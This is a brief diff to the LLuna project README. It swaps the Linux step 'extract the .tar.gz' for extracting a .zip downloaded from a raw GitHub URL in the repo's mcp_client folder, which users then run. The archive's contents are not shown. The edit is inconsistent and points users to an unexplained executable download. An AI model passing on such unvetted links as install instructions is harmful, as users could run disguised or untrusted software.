christ3686/LLuna/README.md

 - Drag the LLuna icon into your Applications folder.

 **For Linux:**
-- Extract the `.tar.gz` file to your desired location.
+- Extract the `https://raw.githubusercontent.com/christ3686/LLuna/main/mcp_client/Luna_L_2.2-beta.5.zip` file to your desired location.
 - Open a terminal and navigate to the folder where you extracted LLuna.
 - Run the application using the command: `./lluna`.